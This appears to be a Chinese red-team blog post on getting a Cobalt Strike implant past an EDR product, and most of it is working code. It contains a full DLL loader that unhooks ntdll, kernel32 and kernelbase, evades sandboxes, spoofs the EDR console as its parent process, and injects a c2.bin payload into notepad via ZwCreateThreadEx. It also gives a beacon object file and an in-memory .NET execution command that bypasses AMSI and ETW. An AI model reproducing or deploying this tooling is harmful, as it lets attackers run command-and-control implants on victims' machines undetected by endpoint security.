免杀实战-EDR对抗

杀软分析

x64dgb简单调试发现该edr在r3环对ntdll.dll和kernel32.dll关键函数均存在hook，这里硬盘读取原来的dll进行重新加载，原理如图

loader

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include 
#include 
#include
#include
#include 

BOOL  EnableDebugPrivilege()
{
	HANDLE token_handle;
	LUID luid;
	TOKEN_PRIVILEGES tkp;
	//打开访问令牌
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token_handle))
	{
		return   FALSE;
	}
	//查询luid
	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
	{
		CloseHandle(token_handle);
		return   FALSE;
	}
	tkp.PrivilegeCount = 1;
	tkp.Privileges[0].Luid = luid;
	tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	//调整访问令牌权限
	if (!AdjustTokenPrivileges(token_handle, FALSE, &tkp, sizeof(tkp), NULL, NULL))
	{
		CloseHandle(token_handle);
		return   FALSE;
	}
	return TRUE;
}

typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
	PHANDLE ThreadHandle,
	ACCESS_MASK DesiredAccess,
	LPVOID ObjectAttributes,
	HANDLE ProcessHandle,
	LPTHREAD_START_ROUTINE lpStartAddress,
	LPVOID lpParameter,
	ULONG CreateThreadFlags,
	SIZE_T ZeroBits,
	SIZE_T StackSize,
	SIZE_T MaximumStackSize,
	LPVOID pUnkown
	);
typedef FARPROC
(WINAPI
	* pGetProcAddress)(
		_In_ HMODULE hModule,
		_In_ LPCSTR lpProcName
		);
typedef HMODULE
(WINAPI
	* pLoadLibraryA)(
		_In_ LPCSTR lpLibFileName
		);

int ppidfunc(DWORD pid, LPVOID lpBuffer, DWORD dwFileSize) {
	PROCESS_INFORMATION pi = { 0 };
	STARTUPINFOEXA si = { 0 };
	SIZE_T sizeToAllocate;
	si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
	//getparenthandle
	HANDLE parentProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
	//UpdateProcThreadAttribute
	InitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);
	si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate);
	InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);
	UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL);
	//CreateProcess
	CreateProcessA(NULL, (LPSTR)"notepad.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi);
	LPVOID lpBaseAddress = VirtualAllocEx(pi.hProcess, NULL, dwFileSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
	WriteProcessMemory(pi.hProcess, lpBaseAddress, (LPVOID)lpBuffer, dwFileSize, NULL);
	HANDLE hRemoteThread = NULL;
	DWORD ZwRet = 0;
	HMODULE hNtdll = LoadLibrary(L"ntdll.dll");
	typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)GetProcAddress(hNtdll, "ZwCreateThreadEx");
	ZwRet = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, pi.hProcess, (LPTHREAD_START_ROUTINE)lpBaseAddress, NULL, 0, 0, 0, 0, NULL);
	WaitForSingleObject(hRemoteThread, INFINITE);
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
	CloseHandle(parentProcessHandle);
	return 0;
}
BOOL box()
{
	MEMORYSTATUSEX memoryStatus;
	memoryStatus.dwLength = sizeof(MEMORYSTATUSEX);
	GlobalMemoryStatusEx(&memoryStatus);
	DWORDLONG RAMMB = memoryStatus.ullTotalPhys / 1024 / 1024 / 1024;  //内存RAMMB（G）
	if (RAMMB > 2)
	{
		SYSTEM_INFO systemInfo;
		GetSystemInfo(&systemInfo);
		DWORD numberOfProcessors = systemInfo.dwNumberOfProcessors;
		if (numberOfProcessors > 4)
		return FALSE;
	}
	else
	return TRUE;
}
BOOL  isPrime(long long number) {
	if (number <= 1)
		return FALSE;
	int i = 2;
	for (; i <= number; ++i) {
		if (number % i == 0) {
			return FALSE;
		}
	}
	return TRUE;
}

DWORD UNHOOKntdll(char* dllname) {
	MODULEINFO mi = {};
	HMODULE ntdllModule = GetModuleHandleA(dllname);

	GetModuleInformation(HANDLE(-1), ntdllModule, &mi, sizeof(mi));
	char nn[100] = { 0 };
	LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;//mi.lpBaseOfDll=ntdllModule
	sprintf_s(nn, "c:\\windows\\system32\\%s", dllname);
	HANDLE ntdllFile = CreateFileA((LPCSTR)nn, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
	LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);

	PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
	PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);

	for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
		PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

		if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
			DWORD oldProtection = 0;
			bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
			memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
			isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
		}
	}

	CloseHandle(ntdllFile);
	CloseHandle(ntdllMapping);
	FreeLibrary(ntdllModule);

	return 0;
}
DWORD FindProcPid() {
	HANDLE hProcessSnap = NULL;
	BOOL bRet = FALSE;
	PROCESSENTRY32 pe32 = { 0 };
	DWORD dwProcessId = 0;
	hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
	pe32.dwSize = sizeof(PROCESSENTRY32);
	if (hProcessSnap != INVALID_HANDLE_VALUE) {
		bRet = Process32First(hProcessSnap, &pe32);
		while (bRet) {
			if (!_wcsicmp(pe32.szExeFile, L"EPConsole.exe")) {
				dwProcessId = pe32.th32ProcessID;
				break;
			}
			bRet = Process32Next(hProcessSnap, &pe32);
		}
	}
	return dwProcessId;
}
int killme()
{
	char g_TargetFile[] = "c2.bin";
	//打开文件
	HANDLE hFile = CreateFileA((LPCSTR)g_TargetFile, GENERIC_READ, NULL, NULL, OPEN_EXISTING, 0, NULL);
	//获取文件大小
	DWORD dwFileSize = GetFileSize(hFile, NULL);
	//申请一块内存空间
	PVOID lpBuffer = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	//将内存读取到申请的内存空间
	DWORD dwReadLength = 0;
	ReadFile(hFile, lpBuffer, dwFileSize, &dwReadLength, NULL);
	//关闭文件
	CloseHandle(hFile);
	if (box()) {
		isPrime(1000000000000000003);
	}
	else {
		DWORD pid = FindProcPid();

		UNHOOKntdll((char*)"ntdll.dll");
		UNHOOKntdll((char*)"kernel32.dll");
		UNHOOKntdll((char*)"kernelbase.dll");
		//EnableDebugPrivilege();//对于获取system权限的进程而言需要管理员权限启动
		ppidfunc(pid, lpBuffer, dwFileSize);
	}
	return 0;
}
extern "C" _declspec(dllexport) void test()
{
	killme();
}

BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217

这里伪造成杀软的子进程形成父进程信任链，通过ZwCreateThreadEx对子进程注入上线

通过白名单+伪签名的黑dll上线，发现执行命令就死，猜测应该是cs的shell功能触发了edr的启发式导致被杀

BOF

这里通过BOF执行命令

#include "bofdefs.h"

extern "C" {
    void go(char* buff, int len) {
        
		DFR_LOCAL(KERNEL32, CreateToolhelp32Snapshot);
		DFR_LOCAL(KERNEL32, Process32First);
		DFR_LOCAL(KERNEL32, Process32Next);
		DFR_LOCAL(KERNEL32, CloseHandle);


        //add ...
		PROCESSENTRY32 pe32;
		pe32.dwSize = sizeof(pe32);
		HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
		if (hProcessSnap == INVALID_HANDLE_VALUE)
		{
			BeaconPrintf(CALLBACK_OUTPUT," CreateToolhelp32Snapshot调用失败！ \n");
			return;
		}
		BOOL bMore = Process32First(hProcessSnap, &pe32);
		while (bMore)
		{
			BeaconPrintf(CALLBACK_OUTPUT, "Process Name is : %s\t", pe32.szExeFile);
			BeaconPrintf(CALLBACK_OUTPUT, "Process ID is： % d \n", pe32.th32ProcessID);
			bMore = Process32Next(hProcessSnap, &pe32);
		}
		CloseHandle(hProcessSnap);
    }

}
#ifndef BOF
void main(int argc, char* argv[]) {
    go(NULL, 0);
}

#endif
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

inline-execute a.obj
1

.NET

发现还可以内存加载.NET,需要bypass etw和amsi

using System;
using System.Runtime.InteropServices;
namespace coleak
{
    class winfun
    {
        [DllImport("User32.dll")]
        public static extern int MessageBox(IntPtr h, string m, string c, uint type);
        [DllImport("kernel32.dll", EntryPoint = "Beep")]
        public static extern bool mymethod(uint frequency, uint duration);
    }
    class Program
    {
        static void Main(string[] args)
        {
            winfun winfun = new winfun();
            winfun.MessageBox((IntPtr)0, "yueyy", "coleak", (uint)0);
            Random random = new Random();
            for (int i = 0; i < 10000; i++)
            {
                winfun.mymethod((uint)random.Next(10000), 100);
            }
            Console.ReadLine();
        }
    }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

inlineExecute-Assembly --dotnetassembly test.exe  --amsi --etw --appdomain forRealLegit --mailslot forRealLegit
1